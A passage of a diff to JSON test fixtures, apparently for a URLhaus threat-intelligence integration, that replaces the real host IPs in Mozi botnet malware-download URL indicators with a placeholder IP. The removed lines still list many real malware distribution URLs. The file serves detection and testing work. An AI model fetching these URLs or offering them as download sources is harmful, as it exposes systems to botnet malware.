"http://222.141.10.143:32907/Mozi.m", + "original": "http://89.160.20.156:32907/Mozi.m", "scheme": "http", "port": 32907, - "domain": "222.141.10.143", - "full": "http://222.141.10.143:32907/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32907/Mozi.m" }, - "ip": "222.141.10.143" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693288260Z", - "original": "{\"id\":\"961338\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961338/\",\"url\":\"http://222.141.10.143:32907/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.141.10.143\",\"date_added\":\"2021-01-14 19:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025986300Z", + "original": "{\"id\":\"961338\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961338/\",\"url\":\"http://89.160.20.156:32907/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10084,18 +10084,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://27.198.22.182:57568/Mozi.a", + "original": "http://89.160.20.156:57568/Mozi.a", "scheme": "http", "port": 57568, - "domain": "27.198.22.182", - "full": "http://27.198.22.182:57568/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57568/Mozi.a" }, - "ip": "27.198.22.182" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693291726Z", - "original": "{\"id\":\"961336\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961336/\",\"url\":\"http://27.198.22.182:57568/Mozi.a\",\"url_status\":\"online\",\"host\":\"27.198.22.182\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025993200Z", + "original": "{\"id\":\"961336\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961336/\",\"url\":\"http://89.160.20.156:57568/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10133,18 +10133,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.136.106:40740/Mozi.m", + "original": "http://89.160.20.156:40740/Mozi.m", "scheme": "http", "port": 40740, - "domain": "42.224.136.106", - "full": "http://42.224.136.106:40740/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40740/Mozi.m" }, - "ip": "42.224.136.106" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693295053Z", - "original": "{\"id\":\"961337\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961337/\",\"url\":\"http://42.224.136.106:40740/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.136.106\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026000400Z", + "original": "{\"id\":\"961337\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961337/\",\"url\":\"http://89.160.20.156:40740/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10182,18 +10182,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.41.9:35927/Mozi.m", + "original": "http://89.160.20.156:35927/Mozi.m", "scheme": "http", "port": 35927, - "domain": "42.224.41.9", - "full": "http://42.224.41.9:35927/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35927/Mozi.m" }, - "ip": "42.224.41.9" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693298439Z", - "original": "{\"id\":\"961331\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961331/\",\"url\":\"http://42.224.41.9:35927/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.41.9\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026007400Z", + "original": "{\"id\":\"961331\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961331/\",\"url\":\"http://89.160.20.156:35927/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10231,18 +10231,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://39.77.229.65:55558/Mozi.m", + "original": "http://89.160.20.156:55558/Mozi.m", "scheme": "http", "port": 55558, - "domain": "39.77.229.65", - "full": "http://39.77.229.65:55558/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55558/Mozi.m" }, - "ip": "39.77.229.65" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693302036Z", - "original": "{\"id\":\"961332\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961332/\",\"url\":\"http://39.77.229.65:55558/Mozi.m\",\"url_status\":\"online\",\"host\":\"39.77.229.65\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026014300Z", + "original": "{\"id\":\"961332\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961332/\",\"url\":\"http://89.160.20.156:55558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10280,18 +10280,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.209.112.112:60558/Mozi.m", + "original": "http://89.160.20.156:60558/Mozi.m", "scheme": "http", "port": 60558, - "domain": "27.209.112.112", - "full": "http://27.209.112.112:60558/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60558/Mozi.m" }, - "ip": "27.209.112.112" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693305432Z", - "original": "{\"id\":\"961333\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961333/\",\"url\":\"http://27.209.112.112:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.209.112.112\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026021300Z", + "original": "{\"id\":\"961333\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961333/\",\"url\":\"http://89.160.20.156:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10329,18 +10329,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.139.17.39:59624/Mozi.m", + "original": "http://89.160.20.156:59624/Mozi.m", "scheme": "http", "port": 59624, - "domain": "222.139.17.39", - "full": "http://222.139.17.39:59624/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59624/Mozi.m" }, - "ip": "222.139.17.39" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693308788Z", - "original": "{\"id\":\"961334\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961334/\",\"url\":\"http://222.139.17.39:59624/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.139.17.39\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026028300Z", + "original": "{\"id\":\"961334\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961334/\",\"url\":\"http://89.160.20.156:59624/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10378,18 +10378,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.100.168:39386/Mozi.m", + "original": "http://89.160.20.156:39386/Mozi.m", "scheme": "http", "port": 39386, - "domain": "42.230.100.168", - "full": "http://42.230.100.168:39386/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39386/Mozi.m" }, - "ip": "42.230.100.168" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693312085Z", - "original": "{\"id\":\"961335\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961335/\",\"url\":\"http://42.230.100.168:39386/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.100.168\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026035200Z", + "original": "{\"id\":\"961335\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961335/\",\"url\":\"http://89.160.20.156:39386/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10427,18 +10427,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.78.100:46289/Mozi.m", + "original": "http://89.160.20.156:46289/Mozi.m", "scheme": "http", "port": 46289, - "domain": "182.121.78.100", - "full": "http://182.121.78.100:46289/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46289/Mozi.m" }, - "ip": "182.121.78.100" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693315251Z", - "original": "{\"id\":\"961322\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961322/\",\"url\":\"http://182.121.78.100:46289/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.78.100\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026042300Z", + "original": "{\"id\":\"961322\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961322/\",\"url\":\"http://89.160.20.156:46289/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10476,18 +10476,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://139.190.238.2:34951/Mozi.m", + "original": "http://89.160.20.156:34951/Mozi.m", "scheme": "http", "port": 34951, - "domain": "139.190.238.2", - "full": "http://139.190.238.2:34951/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34951/Mozi.m" }, - "ip": "139.190.238.2" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693318717Z", - "original": "{\"id\":\"961323\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961323/\",\"url\":\"http://139.190.238.2:34951/Mozi.m\",\"url_status\":\"offline\",\"host\":\"139.190.238.2\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026049300Z", + "original": "{\"id\":\"961323\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961323/\",\"url\":\"http://89.160.20.156:34951/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10525,18 +10525,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.122.75:47594/Mozi.m", + "original": "http://89.160.20.156:47594/Mozi.m", "scheme": "http", "port": 47594, - "domain": "186.33.122.75", - "full": "http://186.33.122.75:47594/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47594/Mozi.m" }, - "ip": "186.33.122.75" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693322654Z", - "original": "{\"id\":\"961324\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961324/\",\"url\":\"http://186.33.122.75:47594/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.122.75\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026056200Z", + "original": "{\"id\":\"961324\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961324/\",\"url\":\"http://89.160.20.156:47594/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10574,18 +10574,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.32.64:55792/Mozi.m", + "original": "http://89.160.20.156:55792/Mozi.m", "scheme": "http", "port": 55792, - "domain": "182.121.32.64", - "full": "http://182.121.32.64:55792/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55792/Mozi.m" }, - "ip": "182.121.32.64" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693328686Z", - "original": "{\"id\":\"961325\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961325/\",\"url\":\"http://182.121.32.64:55792/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.32.64\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026063200Z", + "original": "{\"id\":\"961325\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961325/\",\"url\":\"http://89.160.20.156:55792/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10623,18 +10623,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.9.207.172:35271/Mozi.m", + "original": "http://89.160.20.156:35271/Mozi.m", "scheme": "http", "port": 35271, - "domain": "123.9.207.172", - "full": "http://123.9.207.172:35271/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35271/Mozi.m" }, - "ip": "123.9.207.172" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693332713Z", - "original": "{\"id\":\"961326\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961326/\",\"url\":\"http://123.9.207.172:35271/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.207.172\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026070Z", + "original": "{\"id\":\"961326\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961326/\",\"url\":\"http://89.160.20.156:35271/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10672,18 +10672,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.122.231:36300/Mozi.m", + "original": "http://89.160.20.156:36300/Mozi.m", "scheme": "http", "port": 36300, - "domain": "186.33.122.231", - "full": "http://186.33.122.231:36300/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36300/Mozi.m" }, - "ip": "186.33.122.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693336951Z", - "original": "{\"id\":\"961327\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961327/\",\"url\":\"http://186.33.122.231:36300/Mozi.m\",\"url_status\":\"offline\",\"host\":\"186.33.122.231\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026076900Z", + "original": "{\"id\":\"961327\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961327/\",\"url\":\"http://89.160.20.156:36300/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10721,18 +10721,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.128.242:60680/Mozi.m", + "original": "http://89.160.20.156:60680/Mozi.m", "scheme": "http", "port": 60680, - "domain": "182.121.128.242", - "full": "http://182.121.128.242:60680/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60680/Mozi.m" }, - "ip": "182.121.128.242" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693340568Z", - "original": "{\"id\":\"961328\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961328/\",\"url\":\"http://182.121.128.242:60680/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.128.242\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026083900Z", + "original": "{\"id\":\"961328\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961328/\",\"url\":\"http://89.160.20.156:60680/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10770,18 +10770,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://175.172.66.144:51132/Mozi.a", + "original": "http://89.160.20.156:51132/Mozi.a", "scheme": "http", "port": 51132, - "domain": "175.172.66.144", - "full": "http://175.172.66.144:51132/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51132/Mozi.a" }, - "ip": "175.172.66.144" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693344616Z", - "original": "{\"id\":\"961329\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961329/\",\"url\":\"http://175.172.66.144:51132/Mozi.a\",\"url_status\":\"online\",\"host\":\"175.172.66.144\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026090800Z", + "original": "{\"id\":\"961329\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961329/\",\"url\":\"http://89.160.20.156:51132/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10819,18 +10819,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.116.99.242:39049/Mozi.m", + "original": "http://89.160.20.156:39049/Mozi.m", "scheme": "http", "port": 39049, - "domain": "182.116.99.242", - "full": "http://182.116.99.242:39049/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39049/Mozi.m" }, - "ip": "182.116.99.242" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693348152Z", - "original": "{\"id\":\"961330\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961330/\",\"url\":\"http://182.116.99.242:39049/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.99.242\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026097700Z", + "original": "{\"id\":\"961330\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961330/\",\"url\":\"http://89.160.20.156:39049/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10868,18 +10868,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.248.62.107:57455/Mozi.m", + "original": "http://89.160.20.156:57455/Mozi.m", "scheme": "http", "port": 57455, - "domain": "117.248.62.107", - "full": "http://117.248.62.107:57455/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57455/Mozi.m" }, - "ip": "117.248.62.107" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693351789Z", - "original": "{\"id\":\"961321\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961321/\",\"url\":\"http://117.248.62.107:57455/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.248.62.107\",\"date_added\":\"2021-01-14 19:49:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026104600Z", + "original": "{\"id\":\"961321\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961321/\",\"url\":\"http://89.160.20.156:57455/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10917,18 +10917,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.172.10:32823/Mozi.m", + "original": "http://89.160.20.156:32823/Mozi.m", "scheme": "http", "port": 32823, - "domain": "117.222.172.10", - "full": "http://117.222.172.10:32823/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32823/Mozi.m" }, - "ip": "117.222.172.10" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693355075Z", - "original": "{\"id\":\"961320\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961320/\",\"url\":\"http://117.222.172.10:32823/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.222.172.10\",\"date_added\":\"2021-01-14 19:49:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026111400Z", + "original": "{\"id\":\"961320\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961320/\",\"url\":\"http://89.160.20.156:32823/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 